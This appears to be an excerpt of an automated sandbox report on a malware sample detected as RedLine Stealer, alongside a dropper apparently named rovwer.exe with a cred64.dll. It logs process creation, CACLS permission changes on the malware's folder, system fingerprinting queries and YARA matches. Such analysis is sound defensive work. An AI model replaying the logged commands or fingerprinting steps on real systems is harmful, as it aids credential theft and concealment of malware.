Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe Process created: unknown unknown
Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286813031.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258274130.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.319633888.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.324125536.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286813031.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258274130.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.307075879.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.286195559.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.257831649.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286813031.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258274130.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: GetLocaleInfoA, 12_2_00417A20
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Queries volume information: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Users\user\AppData\Local\Temp\816F.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Queries volume information: C:\ VolumeInformation
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 12_2_00412A15

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE
